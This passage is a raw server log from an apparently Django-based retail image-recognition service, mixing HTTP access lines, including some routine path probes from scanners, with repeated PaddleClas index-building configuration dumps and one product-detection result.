headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 306/353] 106.14.121.178 () {36 vars in 761 bytes} [Wed Feb 2 11:01:03 2022] GET /static/admin/js/LICENSE-JQUERY.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 307/354] 106.14.121.178 () {36 vars in 781 bytes} [Wed Feb 2 11:01:03 2022] GET /static/admin/fonts/Roboto-Light-webfont.woff => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 32/355] 106.14.121.178 () {36 vars in 745 bytes} [Wed Feb 2 11:01:03 2022] GET /static/admin/css/fonts.css => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 33/356] 106.14.121.178 () {36 vars in 749 bytes} [Wed Feb 2 11:01:03 2022] GET /static/admin/img/icon-no.svg => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 34/357] 106.14.121.178 () {36 vars in 715 bytes} [Wed Feb 2 11:01:04 2022] GET /phpMyAdmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 35/358] 106.14.121.178 () {36 vars in 715 bytes} [Wed Feb 2 11:01:04 2022] GET /phpmyadmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 36/359] 106.14.121.178 () {36 vars in 701 bytes} [Wed Feb 2 11:01:04 2022] GET /wcm/ => generated 179 bytes in 0 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 308/360] 178.32.197.83 () {32 vars in 500 bytes} [Wed Feb 2 11:38:40 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 309/361] 23.251.102.74 () {34 vars in 487 bytes} [Wed Feb 2 11:45:38 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 
switches on core 0) +[pid: 19148|app: 0|req: 310/362] 195.154.62.232 () {32 vars in 523 bytes} [Wed Feb 2 12:30:41 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 311/363] 2.57.121.59 () {34 vars in 400 bytes} [Wed Feb 2 12:40:11 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 312/364] 83.97.20.34 () {26 vars in 287 bytes} [Wed Feb 2 12:45:43 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 313/365] 106.14.158.121 () {38 vars in 646 bytes} [Wed Feb 2 14:16:01 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 314/366] 106.14.158.121 () {38 vars in 692 bytes} [Wed Feb 2 14:16:01 2022] GET /explicit_not_exist_path => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 315/367] 106.14.158.121 () {38 vars in 658 bytes} [Wed Feb 2 14:16:01 2022] GET /admin/ => generated 0 bytes in 1 msecs (HTTP/1.1 302) 9 headers in 331 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 316/368] 106.14.158.121 () {38 vars in 695 bytes} [Wed Feb 2 14:16:01 2022] GET /admin/login/?next=/admin/ => generated 2214 bytes in 5 msecs (HTTP/1.1 200) 9 headers in 461 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 317/369] 106.14.158.121 () {40 vars in 755 bytes} [Wed Feb 2 14:16:01 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 318/370] 106.14.158.121 () {40 vars in 757 bytes} [Wed Feb 2 14:16:01 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 319/371] 106.14.158.121 () {40 vars in 787 bytes} [Wed 
Feb 2 14:16:01 2022] GET /login/img/product_logo.png => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 320/372] 106.14.158.121 () {40 vars in 767 bytes} [Wed Feb 2 14:16:01 2022] GET /images/ofbiz.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 321/373] 106.14.158.121 () {40 vars in 757 bytes} [Wed Feb 2 14:16:01 2022] GET /phpMyAdmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 322/374] 106.14.158.121 () {40 vars in 757 bytes} [Wed Feb 2 14:16:01 2022] GET /phpmyadmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 323/375] 106.14.158.121 () {40 vars in 743 bytes} [Wed Feb 2 14:16:01 2022] GET /wcm/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[uwsgi-http key: client_addr: 31.44.185.119 client_port: 7676] hr_read(): Connection reset by peer [plugins/http/http.c line 918] +[pid: 19148|app: 0|req: 324/376] 35.195.93.98 () {42 vars in 561 bytes} [Wed Feb 2 15:07:08 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 325/377] 49.79.98.245 () {36 vars in 800 bytes} [Wed Feb 2 15:10:04 2022] POST /search/ => generated 20262 bytes in 10 msecs (HTTP/1.1 200) 5 headers in 160 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 326/378] 2.57.121.59 () {34 vars in 400 bytes} [Wed Feb 2 15:10:07 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 14/379] 49.79.98.245 () {36 vars in 800 bytes} [Wed Feb 2 15:10:17 2022] POST /search/ => generated 20262 bytes in 13 msecs (HTTP/1.1 200) 5 headers in 160 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 327/380] 49.79.98.245 () 
{36 vars in 800 bytes} [Wed Feb 2 15:10:38 2022] POST /search/ => generated 20262 bytes in 9 msecs (HTTP/1.1 200) 5 headers in 160 bytes (1 switches on core 0) +2022-02-02 15:10:56 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. == +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-02-02 15:10:56 INFO: Global : +2022-02-02 15:10:56 INFO: batch_size : 32 +2022-02-02 15:10:56 INFO: cpu_num_threads : 1 +2022-02-02 15:10:56 INFO: enable_benchmark : True +2022-02-02 15:10:56 INFO: enable_mkldnn : True +2022-02-02 15:10:56 INFO: enable_profile : False +2022-02-02 15:10:56 INFO: gpu_mem : 8000 +2022-02-02 15:10:56 INFO: ir_optim : True +2022-02-02 15:10:56 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-02 15:10:56 INFO: use_fp16 : False +2022-02-02 15:10:56 INFO: use_gpu : False +2022-02-02 15:10:56 INFO: use_tensorrt : False +2022-02-02 15:10:56 INFO: IndexProcess : +2022-02-02 15:10:56 INFO: data_file : /root/Smart_container/PaddleClas/dataset/retail/data_update.txt +2022-02-02 15:10:56 INFO: delimiter : +2022-02-02 15:10:56 INFO: dist_type : IP +2022-02-02 15:10:56 INFO: embedding_size : 512 +2022-02-02 15:10:56 INFO: image_root : /root/Smart_container/PaddleClas/dataset/retail +2022-02-02 15:10:56 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-02 15:10:56 INFO: index_method : HNSW32 +2022-02-02 15:10:56 INFO: index_operation : new +2022-02-02 15:10:56 INFO: RecPostProcess : None +2022-02-02 15:10:56 INFO: RecPreProcess : +2022-02-02 15:10:56 INFO: transform_ops : +2022-02-02 15:10:56 INFO: ResizeImage : +2022-02-02 15:10:56 INFO: size : 224 +2022-02-02 15:10:56 INFO: NormalizeImage : 
+2022-02-02 15:10:56 INFO: mean : [0.485, 0.456, 0.406] +2022-02-02 15:10:56 INFO: order : +2022-02-02 15:10:56 INFO: scale : 0.00392157 +2022-02-02 15:10:56 INFO: std : [0.229, 0.224, 0.225] +2022-02-02 15:10:56 INFO: ToCHWImage : None + 0%| | 0/190 [00:00 generated 34 bytes in 7452 msecs (HTTP/1.1 200) 5 headers in 157 bytes (1 switches on core 0) +2022-02-02 15:11:17 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. == +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-02-02 15:11:17 INFO: Global : +2022-02-02 15:11:17 INFO: batch_size : 32 +2022-02-02 15:11:17 INFO: cpu_num_threads : 1 +2022-02-02 15:11:17 INFO: enable_benchmark : True +2022-02-02 15:11:17 INFO: enable_mkldnn : True +2022-02-02 15:11:17 INFO: enable_profile : False +2022-02-02 15:11:17 INFO: gpu_mem : 8000 +2022-02-02 15:11:17 INFO: ir_optim : True +2022-02-02 15:11:17 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-02 15:11:17 INFO: use_fp16 : False +2022-02-02 15:11:17 INFO: use_gpu : False +2022-02-02 15:11:17 INFO: use_tensorrt : False +2022-02-02 15:11:17 INFO: IndexProcess : +2022-02-02 15:11:17 INFO: data_file : /root/Smart_container/PaddleClas/dataset/retail/data_update.txt +2022-02-02 15:11:17 INFO: delimiter : +2022-02-02 15:11:17 INFO: dist_type : IP +2022-02-02 15:11:17 INFO: embedding_size : 512 +2022-02-02 15:11:17 INFO: image_root : /root/Smart_container/PaddleClas/dataset/retail +2022-02-02 15:11:17 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-02 15:11:17 INFO: index_method : HNSW32 +2022-02-02 15:11:17 INFO: index_operation : new +2022-02-02 15:11:17 INFO: RecPostProcess : None +2022-02-02 15:11:17 INFO: 
RecPreProcess : +2022-02-02 15:11:17 INFO: transform_ops : +2022-02-02 15:11:17 INFO: ResizeImage : +2022-02-02 15:11:17 INFO: size : 224 +2022-02-02 15:11:17 INFO: NormalizeImage : +2022-02-02 15:11:17 INFO: mean : [0.485, 0.456, 0.406] +2022-02-02 15:11:17 INFO: order : +2022-02-02 15:11:17 INFO: scale : 0.00392157 +2022-02-02 15:11:17 INFO: std : [0.229, 0.224, 0.225] +2022-02-02 15:11:17 INFO: ToCHWImage : None + 0%| | 0/189 [00:00 generated 34 bytes in 7469 msecs (HTTP/1.1 200) 5 headers in 157 bytes (1 switches on core 0) +2022-02-02 15:11:30 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. == +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-02-02 15:11:30 INFO: Global : +2022-02-02 15:11:30 INFO: batch_size : 32 +2022-02-02 15:11:30 INFO: cpu_num_threads : 1 +2022-02-02 15:11:30 INFO: enable_benchmark : True +2022-02-02 15:11:30 INFO: enable_mkldnn : True +2022-02-02 15:11:30 INFO: enable_profile : False +2022-02-02 15:11:30 INFO: gpu_mem : 8000 +2022-02-02 15:11:30 INFO: ir_optim : True +2022-02-02 15:11:30 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-02 15:11:30 INFO: use_fp16 : False +2022-02-02 15:11:30 INFO: use_gpu : False +2022-02-02 15:11:30 INFO: use_tensorrt : False +2022-02-02 15:11:30 INFO: IndexProcess : +2022-02-02 15:11:30 INFO: data_file : /root/Smart_container/PaddleClas/dataset/retail/data_update.txt +2022-02-02 15:11:30 INFO: delimiter : +2022-02-02 15:11:30 INFO: dist_type : IP +2022-02-02 15:11:30 INFO: embedding_size : 512 +2022-02-02 15:11:30 INFO: image_root : /root/Smart_container/PaddleClas/dataset/retail +2022-02-02 15:11:30 INFO: index_dir : 
/root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-02 15:11:30 INFO: index_method : HNSW32 +2022-02-02 15:11:30 INFO: index_operation : new +2022-02-02 15:11:30 INFO: RecPostProcess : None +2022-02-02 15:11:30 INFO: RecPreProcess : +2022-02-02 15:11:30 INFO: transform_ops : +2022-02-02 15:11:30 INFO: ResizeImage : +2022-02-02 15:11:30 INFO: size : 224 +2022-02-02 15:11:30 INFO: NormalizeImage : +2022-02-02 15:11:30 INFO: mean : [0.485, 0.456, 0.406] +2022-02-02 15:11:30 INFO: order : +2022-02-02 15:11:30 INFO: scale : 0.00392157 +2022-02-02 15:11:30 INFO: std : [0.229, 0.224, 0.225] +2022-02-02 15:11:30 INFO: ToCHWImage : None + 0%| | 0/188 [00:00 generated 34 bytes in 7458 msecs (HTTP/1.1 200) 5 headers in 157 bytes (1 switches on core 0) +2022-02-02 15:11:42 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. 
== +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-02-02 15:11:42 INFO: Global : +2022-02-02 15:11:42 INFO: batch_size : 32 +2022-02-02 15:11:42 INFO: cpu_num_threads : 1 +2022-02-02 15:11:42 INFO: enable_benchmark : True +2022-02-02 15:11:42 INFO: enable_mkldnn : True +2022-02-02 15:11:42 INFO: enable_profile : False +2022-02-02 15:11:42 INFO: gpu_mem : 8000 +2022-02-02 15:11:42 INFO: ir_optim : True +2022-02-02 15:11:42 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-02 15:11:42 INFO: use_fp16 : False +2022-02-02 15:11:42 INFO: use_gpu : False +2022-02-02 15:11:42 INFO: use_tensorrt : False +2022-02-02 15:11:42 INFO: IndexProcess : +2022-02-02 15:11:42 INFO: data_file : /root/Smart_container/PaddleClas/dataset/retail/data_update.txt +2022-02-02 15:11:42 INFO: delimiter : +2022-02-02 15:11:42 INFO: dist_type : IP +2022-02-02 15:11:42 INFO: embedding_size : 512 +2022-02-02 15:11:42 INFO: image_root : /root/Smart_container/PaddleClas/dataset/retail +2022-02-02 15:11:42 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-02 15:11:42 INFO: index_method : HNSW32 +2022-02-02 15:11:42 INFO: index_operation : new +2022-02-02 15:11:42 INFO: RecPostProcess : None +2022-02-02 15:11:42 INFO: RecPreProcess : +2022-02-02 15:11:42 INFO: transform_ops : +2022-02-02 15:11:42 INFO: ResizeImage : +2022-02-02 15:11:42 INFO: size : 224 +2022-02-02 15:11:42 INFO: NormalizeImage : +2022-02-02 15:11:42 INFO: mean : [0.485, 0.456, 0.406] +2022-02-02 15:11:42 INFO: order : +2022-02-02 15:11:42 INFO: scale : 0.00392157 +2022-02-02 15:11:42 INFO: std : [0.229, 0.224, 0.225] +2022-02-02 15:11:42 INFO: ToCHWImage : None + 0%| | 0/187 [00:00 generated 34 bytes in 7424 msecs (HTTP/1.1 200) 5 headers in 157 bytes (1 switches on core 0) +2022-02-02 15:11:56 INFO: 
+=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. == +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-02-02 15:11:56 INFO: Global : +2022-02-02 15:11:56 INFO: batch_size : 32 +2022-02-02 15:11:56 INFO: cpu_num_threads : 1 +2022-02-02 15:11:56 INFO: enable_benchmark : True +2022-02-02 15:11:56 INFO: enable_mkldnn : True +2022-02-02 15:11:56 INFO: enable_profile : False +2022-02-02 15:11:56 INFO: gpu_mem : 8000 +2022-02-02 15:11:56 INFO: ir_optim : True +2022-02-02 15:11:56 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-02 15:11:56 INFO: use_fp16 : False +2022-02-02 15:11:56 INFO: use_gpu : False +2022-02-02 15:11:56 INFO: use_tensorrt : False +2022-02-02 15:11:56 INFO: IndexProcess : +2022-02-02 15:11:56 INFO: data_file : /root/Smart_container/PaddleClas/dataset/retail/data_update.txt +2022-02-02 15:11:56 INFO: delimiter : +2022-02-02 15:11:56 INFO: dist_type : IP +2022-02-02 15:11:56 INFO: embedding_size : 512 +2022-02-02 15:11:56 INFO: image_root : /root/Smart_container/PaddleClas/dataset/retail +2022-02-02 15:11:56 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-02 15:11:56 INFO: index_method : HNSW32 +2022-02-02 15:11:56 INFO: index_operation : new +2022-02-02 15:11:56 INFO: RecPostProcess : None +2022-02-02 15:11:56 INFO: RecPreProcess : +2022-02-02 15:11:56 INFO: transform_ops : +2022-02-02 15:11:56 INFO: ResizeImage : +2022-02-02 15:11:56 INFO: size : 224 +2022-02-02 15:11:56 INFO: NormalizeImage : +2022-02-02 15:11:56 INFO: mean : [0.485, 0.456, 0.406] +2022-02-02 15:11:56 INFO: order : +2022-02-02 15:11:56 INFO: scale : 0.00392157 +2022-02-02 15:11:56 INFO: std : [0.229, 0.224, 0.225] 
+2022-02-02 15:11:56 INFO: ToCHWImage : None + 0%| | 0/186 [00:00 generated 34 bytes in 7348 msecs (HTTP/1.1 200) 5 headers in 157 bytes (1 switches on core 0) +2022-02-02 15:12:08 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. == +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-02-02 15:12:08 INFO: Global : +2022-02-02 15:12:08 INFO: batch_size : 32 +2022-02-02 15:12:08 INFO: cpu_num_threads : 1 +2022-02-02 15:12:08 INFO: enable_benchmark : True +2022-02-02 15:12:08 INFO: enable_mkldnn : True +2022-02-02 15:12:08 INFO: enable_profile : False +2022-02-02 15:12:08 INFO: gpu_mem : 8000 +2022-02-02 15:12:08 INFO: ir_optim : True +2022-02-02 15:12:08 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-02 15:12:08 INFO: use_fp16 : False +2022-02-02 15:12:08 INFO: use_gpu : False +2022-02-02 15:12:08 INFO: use_tensorrt : False +2022-02-02 15:12:08 INFO: IndexProcess : +2022-02-02 15:12:08 INFO: data_file : /root/Smart_container/PaddleClas/dataset/retail/data_update.txt +2022-02-02 15:12:08 INFO: delimiter : +2022-02-02 15:12:08 INFO: dist_type : IP +2022-02-02 15:12:08 INFO: embedding_size : 512 +2022-02-02 15:12:08 INFO: image_root : /root/Smart_container/PaddleClas/dataset/retail +2022-02-02 15:12:08 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-02 15:12:08 INFO: index_method : HNSW32 +2022-02-02 15:12:08 INFO: index_operation : new +2022-02-02 15:12:08 INFO: RecPostProcess : None +2022-02-02 15:12:08 INFO: RecPreProcess : +2022-02-02 15:12:08 INFO: transform_ops : +2022-02-02 15:12:08 INFO: ResizeImage : +2022-02-02 15:12:08 INFO: size : 224 +2022-02-02 15:12:08 INFO: NormalizeImage : 
+2022-02-02 15:12:08 INFO: mean : [0.485, 0.456, 0.406] +2022-02-02 15:12:08 INFO: order : +2022-02-02 15:12:08 INFO: scale : 0.00392157 +2022-02-02 15:12:08 INFO: std : [0.229, 0.224, 0.225] +2022-02-02 15:12:08 INFO: ToCHWImage : None + 0%| | 0/185 [00:00 generated 34 bytes in 7210 msecs (HTTP/1.1 200) 5 headers in 157 bytes (1 switches on core 0) +2022-02-02 15:12:19 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. == +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-02-02 15:12:19 INFO: Global : +2022-02-02 15:12:19 INFO: batch_size : 32 +2022-02-02 15:12:19 INFO: cpu_num_threads : 1 +2022-02-02 15:12:19 INFO: enable_benchmark : True +2022-02-02 15:12:19 INFO: enable_mkldnn : True +2022-02-02 15:12:19 INFO: enable_profile : False +2022-02-02 15:12:19 INFO: gpu_mem : 8000 +2022-02-02 15:12:19 INFO: ir_optim : True +2022-02-02 15:12:19 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-02 15:12:19 INFO: use_fp16 : False +2022-02-02 15:12:19 INFO: use_gpu : False +2022-02-02 15:12:19 INFO: use_tensorrt : False +2022-02-02 15:12:19 INFO: IndexProcess : +2022-02-02 15:12:19 INFO: data_file : /root/Smart_container/PaddleClas/dataset/retail/data_update.txt +2022-02-02 15:12:19 INFO: delimiter : +2022-02-02 15:12:19 INFO: dist_type : IP +2022-02-02 15:12:19 INFO: embedding_size : 512 +2022-02-02 15:12:19 INFO: image_root : /root/Smart_container/PaddleClas/dataset/retail +2022-02-02 15:12:19 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-02 15:12:19 INFO: index_method : HNSW32 +2022-02-02 15:12:19 INFO: index_operation : new +2022-02-02 15:12:19 INFO: RecPostProcess : None +2022-02-02 15:12:19 INFO: 
RecPreProcess : +2022-02-02 15:12:19 INFO: transform_ops : +2022-02-02 15:12:19 INFO: ResizeImage : +2022-02-02 15:12:19 INFO: size : 224 +2022-02-02 15:12:19 INFO: NormalizeImage : +2022-02-02 15:12:19 INFO: mean : [0.485, 0.456, 0.406] +2022-02-02 15:12:19 INFO: order : +2022-02-02 15:12:19 INFO: scale : 0.00392157 +2022-02-02 15:12:19 INFO: std : [0.229, 0.224, 0.225] +2022-02-02 15:12:19 INFO: ToCHWImage : None + 0%| | 0/184 [00:00 generated 34 bytes in 7116 msecs (HTTP/1.1 200) 5 headers in 157 bytes (1 switches on core 0) +2022-02-02 15:15:15 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. == +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-02-02 15:15:15 INFO: Global : +2022-02-02 15:15:15 INFO: batch_size : 32 +2022-02-02 15:15:15 INFO: cpu_num_threads : 1 +2022-02-02 15:15:15 INFO: enable_benchmark : True +2022-02-02 15:15:15 INFO: enable_mkldnn : True +2022-02-02 15:15:15 INFO: enable_profile : False +2022-02-02 15:15:15 INFO: gpu_mem : 8000 +2022-02-02 15:15:15 INFO: ir_optim : True +2022-02-02 15:15:15 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-02 15:15:15 INFO: use_fp16 : False +2022-02-02 15:15:15 INFO: use_gpu : False +2022-02-02 15:15:15 INFO: use_tensorrt : False +2022-02-02 15:15:15 INFO: IndexProcess : +2022-02-02 15:15:15 INFO: data_file : /root/Smart_container/PaddleClas/dataset/retail/data_update.txt +2022-02-02 15:15:15 INFO: delimiter : +2022-02-02 15:15:15 INFO: dist_type : IP +2022-02-02 15:15:15 INFO: embedding_size : 512 +2022-02-02 15:15:15 INFO: image_root : /root/Smart_container/PaddleClas/dataset/retail +2022-02-02 15:15:15 INFO: index_dir : 
/root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-02 15:15:15 INFO: index_method : HNSW32 +2022-02-02 15:15:15 INFO: index_operation : new +2022-02-02 15:15:15 INFO: RecPostProcess : None +2022-02-02 15:15:15 INFO: RecPreProcess : +2022-02-02 15:15:15 INFO: transform_ops : +2022-02-02 15:15:15 INFO: ResizeImage : +2022-02-02 15:15:15 INFO: size : 224 +2022-02-02 15:15:15 INFO: NormalizeImage : +2022-02-02 15:15:15 INFO: mean : [0.485, 0.456, 0.406] +2022-02-02 15:15:15 INFO: order : +2022-02-02 15:15:15 INFO: scale : 0.00392157 +2022-02-02 15:15:15 INFO: std : [0.229, 0.224, 0.225] +2022-02-02 15:15:15 INFO: ToCHWImage : None + 0%| | 0/185 [00:00 generated 34 bytes in 7298 msecs (HTTP/1.1 200) 5 headers in 157 bytes (33 switches on core 0) +2022-02-02 15:15:52 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. 
== +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-02-02 15:15:52 INFO: DetPostProcess : +2022-02-02 15:15:52 INFO: DetPreProcess : +2022-02-02 15:15:52 INFO: transform_ops : +2022-02-02 15:15:52 INFO: DetResize : +2022-02-02 15:15:52 INFO: interp : 2 +2022-02-02 15:15:52 INFO: keep_ratio : False +2022-02-02 15:15:52 INFO: target_size : [640, 640] +2022-02-02 15:15:52 INFO: DetNormalizeImage : +2022-02-02 15:15:52 INFO: is_scale : True +2022-02-02 15:15:52 INFO: mean : [0.485, 0.456, 0.406] +2022-02-02 15:15:52 INFO: std : [0.229, 0.224, 0.225] +2022-02-02 15:15:52 INFO: DetPermute : +2022-02-02 15:15:52 INFO: Global : +2022-02-02 15:15:52 INFO: batch_size : 1 +2022-02-02 15:15:52 INFO: cpu_num_threads : 1 +2022-02-02 15:15:52 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-02 15:15:52 INFO: enable_benchmark : True +2022-02-02 15:15:52 INFO: enable_mkldnn : True +2022-02-02 15:15:52 INFO: enable_profile : False +2022-02-02 15:15:52 INFO: gpu_mem : 8000 +2022-02-02 15:15:52 INFO: image_shape : [3, 640, 640] +2022-02-02 15:15:52 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/retail/test1.jpg +2022-02-02 15:15:52 INFO: ir_optim : True +2022-02-02 15:15:52 INFO: labe_list : ['foreground'] +2022-02-02 15:15:52 INFO: max_det_results : 5 +2022-02-02 15:15:52 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-02 15:15:52 INFO: rec_nms_thresold : 0.05 +2022-02-02 15:15:52 INFO: threshold : 0.2 +2022-02-02 15:15:52 INFO: use_fp16 : False +2022-02-02 15:15:52 INFO: use_gpu : False +2022-02-02 15:15:52 INFO: use_tensorrt : False +2022-02-02 15:15:52 INFO: IndexProcess : +2022-02-02 15:15:52 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-02 15:15:52 INFO: return_k : 5 +2022-02-02 15:15:52 
INFO: score_thres : 0.5 +2022-02-02 15:15:52 INFO: RecPostProcess : None +2022-02-02 15:15:52 INFO: RecPreProcess : +2022-02-02 15:15:52 INFO: transform_ops : +2022-02-02 15:15:52 INFO: ResizeImage : +2022-02-02 15:15:52 INFO: size : 224 +2022-02-02 15:15:52 INFO: NormalizeImage : +2022-02-02 15:15:52 INFO: mean : [0.485, 0.456, 0.406] +2022-02-02 15:15:52 INFO: order : +2022-02-02 15:15:52 INFO: scale : 0.00392157 +2022-02-02 15:15:52 INFO: std : [0.229, 0.224, 0.225] +2022-02-02 15:15:52 INFO: ToCHWImage : None +Inference: 373.00872802734375 ms per batch image +[{'bbox': [420, 507, 716, 1058], 'rec_docs': '小度充电宝', 'rec_scores': 0.8625434}, {'bbox': [20, 87, 332, 1227], 'rec_docs': '小度电子保温杯', 'rec_scores': 0.720316}] +{'bbox': [420, 507, 716, 1058], 'rec_docs': '小度充电宝', 'rec_scores': 0.8625434} +{'bbox': [20, 87, 332, 1227], 'rec_docs': '小度电子保温杯', 'rec_scores': 0.720316} +234 +["{'bbox': [420, 507, 716, 1058], 'rec_docs': '小度充电宝', 'rec_scores': 0.8625434}\n", "{'bbox': [20, 87, 332, 1227], 'rec_docs': '小度电子保温杯', 'rec_scores': 0.720316}\n"] +['小度充电宝', '小度电子保温杯'] +['小度充电宝', '48', '小度电子保温杯', '46'] +[pid: 19145|app: 0|req: 2/389] 49.79.98.245 () {36 vars in 810 bytes} [Wed Feb 2 15:15:51 2022] POST /reference/ => generated 172 bytes in 3095 msecs (HTTP/1.1 200) 5 headers in 158 bytes (36 switches on core 0) +[pid: 19148|app: 0|req: 332/390] 61.147.15.67 () {40 vars in 669 bytes} [Wed Feb 2 15:15:56 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 38/391] 61.147.15.67 () {40 vars in 732 bytes} [Wed Feb 2 15:17:29 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 333/392] 106.75.169.79 () {30 vars in 328 bytes} [Wed Feb 2 16:22:43 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[uwsgi-http key: client_addr: 31.44.185.119 client_port: 7676] 
